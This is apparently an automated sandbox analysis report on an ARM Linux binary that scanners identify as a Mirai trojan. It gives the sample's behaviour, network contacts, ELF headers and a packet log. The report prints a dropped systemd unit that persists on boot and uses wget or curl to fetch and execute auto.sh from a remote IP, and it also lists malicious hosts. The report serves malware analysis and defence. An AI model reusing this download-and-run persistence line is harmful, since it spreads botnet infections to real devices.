Source: arm.elf, 6236.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6293.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6295.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6301.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6309.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6315.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6317.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6326.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6328.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6355.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6357.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6370.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6372.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6383.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6386.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6395.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6397.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6405.1.00007fff5e743000.00007fff5e764000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 6236.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6293.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6295.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6301.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6309.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6315.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6317.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6326.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6328.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6355.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6357.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6370.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6372.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6383.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6386.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6395.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6397.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6405.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: arm.elf, 6236.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6293.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6295.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6301.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6309.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6315.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6317.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6326.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6328.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6355.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6357.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6370.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6372.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6383.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6386.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6395.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6397.1.00007fff5e743000.00007fff5e764000.rw-.sdmp, arm.elf, 6405.1.00007fff5e743000.00007fff5e764000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm.elf, 6536.1.00007fe7f0045000.00007fe7f0250000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManager|P
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583046 Sample: arm.elf Startdate: 01/01/2025 Architecture: LINUX Score: 72 43 tcpdown.suo. [malformed] 2->43 45 109.202.202.202, 80 INIT7CH Switzerland 2->45 47 6 other IPs or domains 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 9 arm.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 3 other processes 2->16 signatures3 53 Sends malformed DNS queries 43->53 process4 signatures5 59 Sample deletes itself 9->59 18 arm.elf 9->18         started        process6 process7 20 arm.elf 18->20         started        23 arm.elf sh 18->23         started        25 arm.elf sh 18->25         started        27 arm.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 arm.elf 20->29         started        31 arm.elf 20->31         started        33 arm.elf 20->33         started        41 36 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 arm.elf 27->39         started        process9
SourceDetectionScannerLabelLink
arm.elf51%VirustotalBrowse
arm.elf53%ReversingLabsLinux.Trojan.Mirai
arm.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://154.216.18.192/auto.sh;100%Avira URL Cloudmalware
http://154.216.18.192/auto.sh100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
104.168.33.8
truetrue
    unknown
    tcpdown.su|1
    unknown
    unknownfalse
      unknown
      tcpdown.suo. [malformed]
      unknown
      unknowntrue
        unknown
        tcpdown.su
        unknown
        unknownfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.18.192/auto.shstartup_command.service.13.drfalse
          • Avira URL Cloud: malware
          unknown
          http://154.216.18.192/auto.sh;arm.elf, startup_command.service.13.drfalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          107.175.130.16
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          23.94.37.42
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          107.175.130.16arm5.elfGet hashmaliciousUnknownBrowse
            23.94.37.42mips.elfGet hashmaliciousUnknownBrowse
              arm5.elfGet hashmaliciousUnknownBrowse
                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                91.189.91.43mips.elfGet hashmaliciousUnknownBrowse
                  arm6.elfGet hashmaliciousUnknownBrowse
                    bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                        B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse
                          i.elfGet hashmaliciousUnknownBrowse
                            main_x86_64.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                              89.250.72.36-sparc-2024-12-31T13_33_10.elfGet hashmaliciousGafgytBrowse
                                i.elfGet hashmaliciousUnknownBrowse
                                  .i.elfGet hashmaliciousUnknownBrowse
                                    91.189.91.42mips.elfGet hashmaliciousUnknownBrowse
                                      arm6.elfGet hashmaliciousUnknownBrowse
                                        bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                            B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse
                                              i.elfGet hashmaliciousUnknownBrowse
                                                main_x86_64.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                                                  89.250.72.36-sparc-2024-12-31T13_33_10.elfGet hashmaliciousGafgytBrowse
                                                    i.elfGet hashmaliciousUnknownBrowse
                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        tcpdown.sux86_64.crdownload.0.drGet hashmaliciousUnknownBrowse
                                                        • 104.168.45.11
                                                        jmhrc116WA.elfGet hashmaliciousUnknownBrowse
                                                        • 172.245.119.70
                                                        VtMI9Eirot.elfGet hashmaliciousUnknownBrowse
                                                        • 172.245.119.70
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS-COLOCROSSINGUSmips.elfGet hashmaliciousUnknownBrowse
                                                        • 104.168.33.8
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 23.94.37.42
                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        INIT7CHmips.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 109.202.202.202
                                                        185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 109.202.202.202
                                                        B_Y_T_E_x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 109.202.202.202
                                                        i.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        main_x86_64.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                                                        • 109.202.202.202
                                                        89.250.72.36-sparc-2024-12-31T13_33_10.elfGet hashmaliciousGafgytBrowse
                                                        • 109.202.202.202
                                                        i.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                        • 109.202.202.202
                                                        AS-COLOCROSSINGUSmips.elfGet hashmaliciousUnknownBrowse
                                                        • 104.168.33.8
                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 23.94.37.42
                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.45.33
                                                        No context
                                                        No context
                                                        Process:/tmp/arm.elf
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):361
                                                        Entropy (8bit):5.140421405816541
                                                        Encrypted:false
                                                        SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXb1vN16R1E/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXpvL6vJ73GLHWrv
                                                        MD5:4D2C868F454B6C55731485CF0F886DC0
                                                        SHA1:032B125DE0A28DCEE8D8D25FBEEB56DB7F403F04
                                                        SHA-256:8C4AE1B82477698F3A8C273B439CB9079794AFB8FC33CD4DEF854936BA37EA2C
                                                        SHA-512:060B2413A0CB2DEC0DB059C190467B5CB0D76209EFFEA4AE3DE2701FA71429B811A6F7E11E813B26806CF72578D1F32B608A02A4CE670EC58B5B65433E3CF11D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.
                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):76
                                                        Entropy (8bit):3.7627880354948586
                                                        Encrypted:false
                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                        Process:/tmp/arm.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):13
                                                        Entropy (8bit):3.3927474104487847
                                                        Encrypted:false
                                                        SSDEEP:3:Tg7G:Tgy
                                                        MD5:060C950602AE5DFAF583473721C0D328
                                                        SHA1:91D13B439729088DC17F1E0519970D82C56F2B07
                                                        SHA-256:F8D4586FDF6230A2D5F431EF44BABDF37F6D7CEDBB3560702B0DC8493DD44EE3
                                                        SHA-512:000D50E0A5736B0AB3B1BF61F55911914808FA197365B10F61F24096E2959ADAC2C3FF0D9ED226AD99934093F9FDD1C7035A22EEB5091DF75402A0A26E7A84AC
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:/tmp/arm.elf.
                                                        File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                        Entropy (8bit):5.915130192869631
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:arm.elf
                                                        File size:84'632 bytes
                                                        MD5:c29418d4e5670276c4e09e8600327919
                                                        SHA1:3807e79f2a9ab460d41223775fcd03fd5b784c33
                                                        SHA256:278c03f07e3ca082c11f74e9b98c45aa12134e253f14f7fa2b58970077b78b1a
                                                        SHA512:15304d54a5ac9189f662ba40d86ba33db1e0749438289a9944bd88319fde776f3e4e857bea320365ef69136455b0885547c129cac8522c5ab34fbd3294635879
                                                        SSDEEP:1536:boViXgeg8lbip2Mq/UrMFswJflvwT7F/LEHRn7r6sSHv43:boV/KH1WwJtYT7RLEJfe43
                                                        TLSH:D3833991BC815613C6C5127BFB6E428D372A13A8D3EF3207DD266F21378692B0E77245
                                                        File Content Preview:.ELF...a..........(.........4....I......4. ...(......................E...E...............E...E...E..................Q.td..................................-...L."...gF..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                        ELF header

                                                        Class:ELF32
                                                        Data:2's complement, little endian
                                                        Version:1 (current)
                                                        Machine:ARM
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:ARM - ABI
                                                        ABI Version:0
                                                        Entry Point Address:0x8190
                                                        Flags:0x202
                                                        ELF Header Size:52
                                                        Program Header Offset:52
                                                        Program Header Size:32
                                                        Number of Program Headers:3
                                                        Section Header Offset:84232
                                                        Section Header Size:40
                                                        Number of Section Headers:10
                                                        Header String Table Index:9
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x80940x940x180x00x6AX004
                                                        .textPROGBITS0x80b00xb00x119d40x00x6AX0016
                                                        .finiPROGBITS0x19a840x11a840x140x00x6AX004
                                                        .rodataPROGBITS0x19a980x11a980x2a6c0x00x2A004
                                                        .ctorsPROGBITS0x245080x145080x80x00x3WA004
                                                        .dtorsPROGBITS0x245100x145100x80x00x3WA004
                                                        .dataPROGBITS0x2451c0x1451c0x3ac0x00x3WA004
                                                        .bssNOBITS0x248c80x148c80xe7140x00x3WA004
                                                        .shstrtabSTRTAB0x00x148c80x3e0x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x80000x80000x145040x145045.94380x5R E0x8000.init .text .fini .rodata
                                                        LOAD0x145080x245080x245080x3c00xead42.78460x6RW 0x8000.ctors .dtors .data .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 1, 2025 17:03:01.684792995 CET43928443192.168.2.2391.189.91.42
                                                        Jan 1, 2025 17:03:02.881268024 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:02.886132002 CET26015932223.94.37.42192.168.2.23
                                                        Jan 1, 2025 17:03:02.886208057 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:02.895489931 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:02.900262117 CET26015932223.94.37.42192.168.2.23
                                                        Jan 1, 2025 17:03:02.900311947 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:02.905109882 CET26015932223.94.37.42192.168.2.23
                                                        Jan 1, 2025 17:03:03.413506031 CET26015932223.94.37.42192.168.2.23
                                                        Jan 1, 2025 17:03:03.413578033 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:03.413753986 CET593222601192.168.2.2323.94.37.42
                                                        Jan 1, 2025 17:03:07.056037903 CET42836443192.168.2.2391.189.91.43
                                                        Jan 1, 2025 17:03:08.847763062 CET4251680192.168.2.23109.202.202.202
                                                        Jan 1, 2025 17:03:09.788935900 CET571007722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.793872118 CET772257100107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:09.793971062 CET571007722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.796188116 CET571007722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.796237946 CET571007722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.800992966 CET772257100107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:09.802752018 CET571027722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.807507992 CET772257102107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:09.810030937 CET571027722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.845463991 CET772257100107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:09.856853008 CET571027722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.856929064 CET571027722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:09.861696959 CET772257102107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:09.905437946 CET772257102107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.067950964 CET571047722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.072792053 CET772257104107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.072839975 CET571047722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.077663898 CET571047722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.077718019 CET571047722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.082389116 CET772257104107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.125503063 CET772257104107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.168199062 CET772257100107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.168268919 CET571007722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.174072027 CET772257102107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.174118042 CET571027722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:10.441555023 CET772257104107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:10.442090988 CET571047722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:11.920166016 CET571067722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:11.925087929 CET772257106107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:11.925146103 CET571067722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:11.926918983 CET571067722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:11.926991940 CET571067722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:11.931667089 CET772257106107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:11.973449945 CET772257106107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.077253103 CET571087722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.082156897 CET772257108107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.082202911 CET571087722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.089384079 CET571087722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.089452982 CET571087722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.094233036 CET772257108107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.141505003 CET772257108107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.202857018 CET571107722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.207751989 CET772257110107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.207835913 CET571107722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.228975058 CET571107722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.229082108 CET571107722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.233817101 CET772257110107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.277529955 CET772257110107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.305428982 CET772257106107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.305558920 CET571067722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.456573963 CET772257108107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.456634045 CET571087722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:12.593394995 CET772257110107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:12.596069098 CET571107722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.076544046 CET571127722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.081553936 CET772257112107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.081618071 CET571127722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.083432913 CET571127722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.083468914 CET571127722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.088311911 CET772257112107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.091954947 CET571147722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.096749067 CET772257114107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.097207069 CET571147722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.129445076 CET772257112107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.166002989 CET571147722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.166098118 CET571147722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.170793056 CET772257114107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.213423014 CET772257114107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.461622953 CET772257114107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.461715937 CET571147722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:17.462673903 CET772257112107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:17.462726116 CET571127722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:21.645956993 CET43928443192.168.2.2391.189.91.42
                                                        Jan 1, 2025 17:03:22.058639050 CET571167722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.063575983 CET772257116107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.063641071 CET571167722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.064502954 CET571167722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.064577103 CET571167722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.069343090 CET772257116107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.080143929 CET571187722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.084981918 CET772257118107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.085047960 CET571187722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.109436989 CET772257116107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.130489111 CET571187722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.130556107 CET571187722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.135277987 CET772257118107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.177447081 CET772257118107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.447561979 CET772257116107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.447624922 CET571167722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:22.449601889 CET772257118107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:22.450162888 CET571187722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.106146097 CET571207722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.110958099 CET772257120107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:27.111021042 CET571207722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.111845970 CET571207722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.111917019 CET571207722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.116604090 CET772257120107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:27.133394003 CET571227722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.138237000 CET772257122107.175.130.16192.168.2.23
                                                        Jan 1, 2025 17:03:27.138295889 CET571227722192.168.2.23107.175.130.16
                                                        Jan 1, 2025 17:03:27.157403946 CET772257120107.175.130.16192.168.2.23
